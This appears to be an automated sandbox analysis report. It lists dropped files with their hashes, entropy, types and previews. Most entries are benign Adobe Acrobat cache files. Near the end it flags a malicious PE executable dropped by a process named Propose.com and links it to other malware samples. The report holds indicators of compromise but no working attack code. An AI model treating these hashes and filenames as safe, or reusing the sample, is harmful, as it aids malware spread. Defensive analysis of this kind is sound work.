                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.295223249591828
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfBD2G6UpnrPeUkwRe9:YvXKXFsqZc0vKsGR22cUkee9
                                                                                      MD5:0CEA9D99B4FCB84D17B25D518BF396CE
                                                                                      SHA1:994C5A0675EB2112AF327FDFC440FA0A08B4DF01
                                                                                      SHA-256:696C7A1F006DB979EE76DC636D3C85E219DFD077B256806E0AEDA3682B0A5628
                                                                                      SHA-512:1D8A55D27907890C1406B52CEB04BB72E8B631F2FAEA127194EF2DB03495827CDDA47040A66B0E3C8EF5D5BF004470185A54804E533A9EB44ACBFEE26C1F0F1A
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):285
                                                                                      Entropy (8bit):5.355978728218936
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfPmwrPeUkwRe9:YvXKXFsqZc0vKsGH56Ukee9
                                                                                      MD5:015C6D3203E057A04FF598BEC3FAB7BF
                                                                                      SHA1:CCCF73BDA08CF9931C16921148CC9A1533EE1ADD
                                                                                      SHA-256:6AD556E36505719AC96150F69A9C79BEDF4DBF1505FFADE12005213D0FF47904
                                                                                      SHA-512:F70750DBFFB94D0A44CF48FBC6423AEBED94EB1379250A9BE945243F66BB6F1E13D10B0D42F6E956719C3E605FD83ACB1B21C70A43AC023F54F205CF19A40A3F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1123
                                                                                      Entropy (8bit):5.684478645217369
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XdzvSpLgE9cQx8LennAvzBvkn0RCmK8czOCCSD:Yvq6hgy6SAFv5Ah8cv/D
                                                                                      MD5:C74CABB16FC9E731F73B2F38599B6DB6
                                                                                      SHA1:95664D1A514CA1FD8F5047BF93D9062D90E764BF
                                                                                      SHA-256:DE4F034F0CDED3B6B90C8421C22E2E183336BBD9B01E717FADC36F1A8D494F00
                                                                                      SHA-512:7A0D0996129020A710AC3262A9D9481A790A017B461A090B51D468FD2D0CAD97C374C1E01D7E1AC987BC3D24CF6119ACC9B1FA348800B21DA2D3096548379D83
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.302109734062179
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJf8dPeUkwRe9:YvXKXFsqZc0vKsGU8Ukee9
                                                                                      MD5:1E5B7D8C96A7F84B1EDCCB35E40A6A4A
                                                                                      SHA1:4583C2408A0DD44A4E9662C2B4B770BCF70CCA11
                                                                                      SHA-256:67097B6BB8CCE69F09713CFE42C9CE1655297E14526868AF7C76CB7461D6863D
                                                                                      SHA-512:AAB26D0677CA647DC8C11BE2DD52DD54E23A8881CA28EF291F6ED8E0489050C901C23AAA51867B3866F7D09B61E1FE9E17C021FAAD74C21A3FA7443A5106B271
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.305640869499285
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfQ1rPeUkwRe9:YvXKXFsqZc0vKsGY16Ukee9
                                                                                      MD5:FA545B53406F68D36AB7E763F2DA673D
                                                                                      SHA1:1FA0E7E60B175E855980FE54BD51BEF1E223EC97
                                                                                      SHA-256:351FA4B3A0AD7CDB772A859C95EC211C3540C427CB2A0BE23FE4273BB14C830C
                                                                                      SHA-512:38AE8D66161D1161EB2F5CC4873B98E3E67687ECAD0FB09BA256B3E3EF48AB0B3B2EF7AFD6F77137525E04025173F11DBF2DA1DE84B86D3108D06FF8B988B835
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.3114478511675385
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfFldPeUkwRe9:YvXKXFsqZc0vKsGz8Ukee9
                                                                                      MD5:5B250B17FF2AEA5864A65E4664177934
                                                                                      SHA1:0FB5794D159FC5B8CF20828AA272D9F5AFC6542D
                                                                                      SHA-256:F12059698FB129CE28B254C357BE54EE3CB6DF8867960F37666608083028E7ED
                                                                                      SHA-512:943C8501BB5D38A743AB14FAB6DBD6474A3B50C89CBC96E248D297CDC92F36354A35AB1D0891B91D0E5EA8031EA25C95A43DC07A080F83BE6A203A74E26DB778
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.329320723843258
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfzdPeUkwRe9:YvXKXFsqZc0vKsGb8Ukee9
                                                                                      MD5:C873301693FBA5E2B2450BF62A542A94
                                                                                      SHA1:BBA1CE76F07BA45D23E1A11796E524A8F1D42B5A
                                                                                      SHA-256:1E113FCB21FB9B284481077AFA6162D92CFD143166CFC0F05E23E8E131EC5F58
                                                                                      SHA-512:AD36950EC204006B8F5575AD1FE905F82F1E0B370843ACF999822A9433DC25BD2C88C1044B2140A016A75C88257B2C2AA61886AF3E3600A62062C7C68168A544
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.309565165436026
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfYdPeUkwRe9:YvXKXFsqZc0vKsGg8Ukee9
                                                                                      MD5:380102BF2D096FBACF05EF546BE77C6C
                                                                                      SHA1:984E8BBBE16FFF16516928508AF29636054457D4
                                                                                      SHA-256:6644132DA00E98B713A17AE01E412FFD2057B7AAF3E045FB25E99329733794F6
                                                                                      SHA-512:10CCB911AAAA55C9F7F72DFAFF51E0C5C991015B5FCA157FEC2260BBB64C3EE4E98C5B07F152223CBE4A65E0E50BB032F7C4C807DD6AF92E0EA44A8AC322CB08
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):284
                                                                                      Entropy (8bit):5.29578393905883
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJf+dPeUkwRe9:YvXKXFsqZc0vKsG28Ukee9
                                                                                      MD5:415DDD5755190569622C1B4CD9E0102C
                                                                                      SHA1:10AD8C1B7EA09D3B446A571AD8BB1D61A1B24F86
                                                                                      SHA-256:A7FCAAE95708F8F08BE4D7DF3C66744673F35142C9FA9D43BC59299DFE9A6242
                                                                                      SHA-512:2393CBDB5A077EA3E6E50B1EDE1E4A3640141E0C51BE8A2F76558A4DFB9A819DF7EC413184E68A521E352BEE701032DEB0C60686AF7F2E133B80471BB013508C
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):291
                                                                                      Entropy (8bit):5.293046523141257
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfbPtdPeUkwRe9:YvXKXFsqZc0vKsGDV8Ukee9
                                                                                      MD5:E5F90594E29CDDB8D2B593DB673CCC52
                                                                                      SHA1:FA20372F31C7D00BED4548E2AA737E556D7F5B92
                                                                                      SHA-256:88FA583B9315329E53D16CE52AEE0359A2BF3FD8B5E0A0F0C698BAB383F4E0EF
                                                                                      SHA-512:2A8882A0AB05BE28D3B6467965FCA03EFCFE0787B0A784AC757CA4F48E31576195C343F881F499AB9551F3134EB949F1BBB183724F7FFFFC8FD12A7B7BF4173C
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.29718062186088
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJf21rPeUkwRe9:YvXKXFsqZc0vKsG+16Ukee9
                                                                                      MD5:CF40C1D254E110323332428CA4A1ABA6
                                                                                      SHA1:F02353EF7C416AD3D33152E35343D07C2C2CDF10
                                                                                      SHA-256:4707E077AB9A57B30C22217AF7933902DAAF761C637611E5A5888BB67EFCE1CF
                                                                                      SHA-512:318FD7FC1BDB45B7E1EC5495702C3BB39C84AECDA97FE5C418C4E982062EC3B4160FAF66C77296B175C9246218567810699361CAF7FB950F65B8A25DC6496037
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1090
                                                                                      Entropy (8bit):5.659208742956334
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XdzvOamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSD:YvqoBgkDMUJUAh8cvMD
                                                                                      MD5:520B66460B9F23AC9A19D4D5BE501259
                                                                                      SHA1:F5BAAF1DA56521182D00E8D89D7F0B9D651922DC
                                                                                      SHA-256:709EB074F902B0256C6A9A16E52A610FC8FB324C75253A6A1B051DCDC84B276D
                                                                                      SHA-512:BEC595CCB29A12832F4B2C4583D1A77AE38888C06395A9DE30254FE9B50B52A500DF75C1F3D4243534DED542917F6429B34DE04BA7B1D857CF719862D024ED64
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):5.272363827994723
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfshHHrPeUkwRe9:YvXKXFsqZc0vKsGUUUkee9
                                                                                      MD5:F177BB5A61DE84F892362F10E296CE68
                                                                                      SHA1:DB0A79A0471FC8C76C2E5EAD7414A7332F96E3FA
                                                                                      SHA-256:0F7CEE3467D7F79810103A60151AD5AEC3298BF3BC788A9887531B64DC25BE4E
                                                                                      SHA-512:339E9E65A9151F86F59D5AC039B7FB864F4F632161FF15C229F1DEA871B5BC068AF3355EE818B785B9849252F9ECE65F58ED45C6AC851C64B42BE670ED1AEB8F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):5.276902353482643
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJTqgFCrPeUkwRe9:YvXKXFsqZc0vKsGTq16Ukee9
                                                                                      MD5:3FC190355DC07A0E77A86546CB39B0D9
                                                                                      SHA1:2BF25DED3822858171A0B6811F8378CCB78E2EFB
                                                                                      SHA-256:30A3FC14B8F744D8F521ABA3CEBF1A32B6A32C754070A2B1386D97C74D96DF21
                                                                                      SHA-512:970EF113E55CE099D0A5FD5243F3EB096AA5FCDEE3D784289B992EF30597A3B1D8AB2C2690023952F7DE22564F1D864969DBC66990B0B856575710C35DF02BDB
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:e:e
                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                      Malicious:false
                                                                                      Preview:....
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):2814
                                                                                      Entropy (8bit):5.140567634433077
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:YSNFLqQqWS2A/1vu1c0eA/3WMlqGb8ymg9mRvK9o8u:aQwP92CKEymiBO
                                                                                      MD5:5EC026FCF8AA010007238E85FA9DB602
                                                                                      SHA1:25BF9E8FF25955C54CD494253BA022963031F012
                                                                                      SHA-256:1AFC0C5C020B2393451A60A77F40B1F45057477102859485031948B6DD630B96
                                                                                      SHA-512:5A958FFDC3A09E659A20EC6C97856114386DE19A0F1E77BD9168A1D30EBD6F7B0B9C8E6BDF172B202B3E755EEF603F95192F7225690C7D3D0A421E209F576113
                                                                                      Malicious:false
                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"54b8f85df2f1c37b24e90874b892f3e0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736632393000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f36098da6ad63fb63a8a1cd23e687ed3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736632393000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"13d9da234d87eb9915ac3a31f5eff872","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736632393000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"6569a48c3ddd0f653412f01fc6fc1360","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736632392000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e9eedb78dc520c28be15b7fb444dd376","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736632392000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7c052792ccbd7f063052a3471d7bccd9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                      Category:dropped
                                                                                      Size (bytes):12288
                                                                                      Entropy (8bit):1.1878850223469222
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:TGufl2GL7msEHUUUUUUUUzSvR9H9vxFGiDIAEkGVvp3:lNVmswUUUUUUUUz+FGSItr
                                                                                      MD5:ADABC56561F882095122E32181D9EA9C
                                                                                      SHA1:753C72402E1F25E52B5543953A310CDD2126E57A
                                                                                      SHA-256:C6C7388CEE3E3C55ADEE80B3DEFE5FD233DD681B9FB24534145C2B1E5EAAA90B
                                                                                      SHA-512:DB5A16786628C4E046EE4C71B5F1FB8ED46C40C3034C65757089AAD2355A8058A4FC5581282CE0EB4B5ED8413E8FCC6007B3B34653E923824E2E270CB8C99745
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):1.6065169864181135
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7MlKUUUUUUUUUU3vR9H9vxFGiDIAEkGVvOqFl2GL7msf:7zUUUUUUUUUUPFGSItYKVmsf
                                                                                      MD5:D00D9B66049D4A95C4C5DE83FE1FA238
                                                                                      SHA1:212AC73F8421CBF3ED48CDF4100B186E9C458EEA
                                                                                      SHA-256:15677169806E5406EBF8B4B7A5ED2CED357055A4953B83FDA600B616CCC9310A
                                                                                      SHA-512:C67194C6A11E6B3F563E7CC7368D5F499B08E70F015676314A3703F20864D4977064F5CB007202F0FFCD3B8B552F4191340EC01AEB0C9143D09A6B1B56BAA003
                                                                                      Malicious:false
                                                                                      Preview:.... .c.....KQhy......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):66726
                                                                                      Entropy (8bit):5.392739213842091
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEg7WVZ5cvFpiU8DF4MjIUKoPAdYyu:6a6TZ44ADE7WZ5cvFpiGvdK
                                                                                      MD5:70A47D0187D9E33A5DB5827C793F9BD2
                                                                                      SHA1:4CC535E7B48399040285834FE5515931BA2B5291
                                                                                      SHA-256:438BD66E6B419BABEFDFA9B581CC8CF5FF5C30A3DAE614EDDDC9EA1C93160EE0
                                                                                      SHA-512:57DEA1616FB45DDD8EE092BA593AEC930514E58F494C3A93052ED0ADA34CA82C4782032CC9FA0D5B39442B6F8D6E3914FB5B9FB11480FCA016E24B5134C6471B
                                                                                      Malicious:false
                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):947288
                                                                                      Entropy (8bit):6.630612696399572
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: c2.hta, Detection: malicious
                                                                                      • Filename: Setup.exe, Detection: malicious
                                                                                      • Filename: Setup.exe, Detection: malicious
                                                                                      • Filename: Setup.exe, Detection: malicious
                                                                                      • Filename: Full-Ver_Setup.exe, Detection: malicious
                                                                                      • Filename: random.exe, Detection: malicious
                                                                                      • Filename: HouseholdsClicking.exe, Detection: malicious
                                                                                      • Filename: DodSussex.exe, Detection: malicious
                                                                                      • Filename: DangerousMidlands.exe, Detection: malicious
                                                                                      • Filename: PortugalForum_nopump.exe, Detection: malicious
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):195
                                                                                      Entropy (8bit):4.7615351185197845
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:RiOnJHonwWDKaJkDHLFkNx5AW9GfwWDKaJkDHLFkNx57:YIQjWaiF+/dG7WaiF+/7
